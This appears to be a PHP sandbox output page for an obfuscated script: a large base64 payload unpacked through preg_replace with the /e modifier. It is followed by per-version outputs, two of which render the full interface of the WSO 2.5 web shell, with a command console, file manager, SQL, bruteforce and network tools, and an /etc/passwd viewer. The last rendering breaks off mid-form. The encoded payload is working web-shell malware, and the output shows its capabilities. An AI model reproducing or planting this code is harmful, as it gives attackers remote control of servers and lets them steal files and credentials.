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'\x29\x29\x29\x3B",".");?>
Output for 7.0.0 - 7.0.20, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
Warning: preg_replace(): The /e modifier is no longer supported, use preg_replace_callback instead in /in/a60Yl on line 2
Output for 5.6.30
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.30 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.29
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.29 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return 